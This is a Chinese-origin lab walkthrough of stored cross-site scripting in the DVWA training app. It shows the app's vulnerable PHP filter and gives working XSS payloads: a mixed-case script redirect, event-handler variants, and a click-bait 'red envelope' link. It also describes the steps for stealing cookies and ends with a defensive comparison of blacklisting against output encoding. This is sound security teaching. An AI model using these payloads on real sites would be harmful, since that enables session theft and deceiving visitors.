DVWA XSS (Stored) cross-site scripting attack
Table of Contents
Principle block diagram
Popup and redirect
Get cookie
Low level
1. Popup
Insert the XSS code:
Return to the XSS page:
Other users visit the page and trigger the XSS:
2. Redirect
Insert the malicious code:
Return to the XSS page and trigger the redirect:
Other users visit the page and trigger the XSS:
3. Get the cookie
Insert the XSS code:
Start a listener on Kali Linux:
Other users visit the page and trigger the XSS:
The cookie is received:
Medium level
View the source code of the page:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>
From the source, the message field is HTML-entity encoded with htmlspecialchars(), so it cannot carry markup, while the name field only has the literal string <script> removed with str_replace().
1. Popup
The name filter only matches the exact string <script>, so it is bypassed by using a different tag, by nesting the string so that removing one copy leaves another behind, or by mixed case.
2. Redirect
JS code:
<scRipT>window.location = "http://www.4399.com"</script>
Insert the code:
Other users visit this page:
3. Get the cookie
Same as the Low level, except that the payload must get past the filter described above.
High level
View the source code: the message field is HTML-entity encoded as before, and the name field is now filtered by a regular expression that matches <script ...>, so that tag cannot be used at all.
Use an event handler on another tag instead:
<body onload = alert('xss')>
<img src = '' onerror = alert('xss')>
<a href = '' onclick = alert('xss')>点我领红包</a>
The third one is used here.
XSS page:
Other users visit the page and "receive red envelopes":
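The Medium and High levels above both fail for the same reason: they try to recognise and remove bad input, and every blacklist has gaps. The following PHP is an added example, not DVWA's own code; it places the Medium-level name filter beside an output-encoding alternative and runs both over constructed payloads mirroring the bypasses shown on this page (the function names and payloads are this example's own).

```php
<?php
// Added example (not DVWA's code): Medium-level blacklist filter versus
// output encoding, run over constructed payloads.

// Medium level: remove the literal string "<script>" and nothing else.
function medium_name_filter(string $name): string {
    return str_replace('<script>', '', $name);
}

// Defensive alternative: encode on output. Every '<', '>', '"', "'" and
// '&' becomes an entity, so the browser can never form a tag or attribute
// from user data, whatever case or nesting tricks the input uses.
function encode_for_html(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Rough check for this demo only: does the string still open a tag?
// A '<' followed by a letter is enough to start one; entity-encoded
// output contains no raw '<' at all.
function looks_like_markup(string $value): bool {
    return (bool) preg_match('/<\s*[a-z]/i', $value);
}

// Constructed payloads corresponding to the bypasses discussed above.
$payloads = [
    'plain script'  => "<script>alert('xss')</script>",
    'mixed case'    => "<scRipT>alert('xss')</script>",
    'nested tag'    => "<scr<script>ipt>alert('xss')</script>",
    'event handler' => "<img src='' onerror=alert('xss')>",
];

foreach ($payloads as $label => $payload) {
    $filtered = medium_name_filter($payload);
    $encoded  = encode_for_html($payload);
    printf("%-14s blacklist leaves markup: %-3s  encoding leaves markup: %s\n",
        $label,
        looks_like_markup($filtered) ? 'yes' : 'no',
        looks_like_markup($encoded)  ? 'yes' : 'no');
}
```

Only the plain <script> payload is stopped by the blacklist; the mixed-case, nested and event-handler variants pass straight through, while the encoded output contains no markup in any case.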